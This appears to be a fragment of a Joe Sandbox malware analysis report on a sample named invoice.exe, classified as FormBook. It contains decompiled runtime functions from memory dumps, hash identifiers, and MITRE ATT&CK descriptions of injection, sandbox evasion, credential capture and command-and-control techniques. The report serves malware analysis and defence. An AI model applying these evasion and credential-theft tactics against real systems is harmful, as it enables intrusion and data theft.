						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E00FFB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x00fe645b
0x00fe6463
0x00fe646d
0x00fe6475
0x00fe647a
0x00fe647e
0x00fe6480
0x00fe648c
0x00fe6490
0x00fe6495
0x00fe6498
0x00fe649b
0x00fe649f
0x00fe64a1
0x01027c07
0x01027c09
0x01027c0c
0x00000000
0x00fe64a7
0x00fe64a7
0x00fe64aa
0x01027bf7
0x01027c00
0x00000000
0x01027bf9
0x01027bf9
0x01027bf9
0x00fe64b0
0x00fe64b0
0x00fe64b2
0x00fe64b2
0x00fe64b3
0x00fe64ba
0x00fe6553
0x00fe655e
0x00fe6566
0x00fe656c
0x00fe6575
0x00fe657f
0x00fe6585
0x00fe6588
0x00fe6588
0x00fe64c7
0x00fe64cb
0x00fe64ce
0x00fe64d3
0x00fe64da
0x00fe64e5
0x00fe64ed
0x00fe64f1
0x00fe64f5
0x00fe64f6
0x00fe64fa
0x00fe6502
0x00fe6503
0x00fe6504
0x00fe6507
0x00fe651a
0x00fe6524
0x00fe6524
0x00fe6526
0x00fe6526
0x00fe64aa
0x00fe652c
0x00fe652d
0x00fe652e
0x00fe6539

APIs

RtlDebugPrintTimes.NTDLL ref: 00FE651A

Strings

0, xrefs: 00FE64FA
0, xrefs: 00FE64E5

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: d1cb827da8930b8b5bb0aaf39c836b2d6dedb6c2e27a3fd02d41b79d5990c9ca
Instruction ID: f2e3edc3cd78516e0f9c809e062c8e2addb3ed3bb75c111f22505dc426de4352
Opcode Fuzzy Hash: d1cb827da8930b8b5bb0aaf39c836b2d6dedb6c2e27a3fd02d41b79d5990c9ca
Instruction Fuzzy Hash: 09418BB2A047469FC311CF29C844A1ABBE4FF98754F04466EF988DB341D735EA05DB86

Uniqueness

Uniqueness Score: -1.00%

Function 0104FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0104FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00FFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01045720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01045720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0104fdda
0x0104fde2
0x0104fde5
0x0104fdec
0x0104fdfa
0x0104fdff
0x0104fe0a
0x0104fe0f
0x0104fe17
0x0104fe1e
0x0104fe19
0x0104fe19
0x0104fe19
0x0104fe20
0x0104fe21
0x0104fe22
0x0104fe25
0x0104fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0104FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0104FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0104FE01

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 3a2aabb11a0090462fd043b910b6efd733fa1909299a7e2087e7b1a9791625c8
Instruction ID: a857a56b1357ade0e23313c12681fd2b7d01863afb07d0b2d2455e4aae688455
Opcode Fuzzy Hash: 3a2aabb11a0090462fd043b910b6efd733fa1909299a7e2087e7b1a9791625c8
Instruction Fuzzy Hash: A5F0F6B2240202BFE6201A49DC42F63BF5AEB45B30F150364F668565E1DA62F82096F1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log

C:\Users\user\AppData\Local\Temp\C5G1Z47d2

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
invoice.exe

Function 025615A0 Relevance: 1.6, APIs: 1, Instructions: 143
processCOMMON

Function 0256159D Relevance: 1.6, APIs: 1, Instructions: 142
processCOMMON

Function 04D103F7 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 04D103F8 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 04D12B30 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 04BCC499 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 04BCA8F4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 02561B48 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Function 025619D0 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Function 02561910 Relevance: 1.6, APIs: 1, Instructions: 58
threadinjectionCOMMON

Function 06E4A3EC Relevance: 1.6, APIs: 1, Instructions: 56
windowCOMMON

Function 04BC8F28 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 04BC9FEB Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Function 02561AA0 Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Function 04BC9D68 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre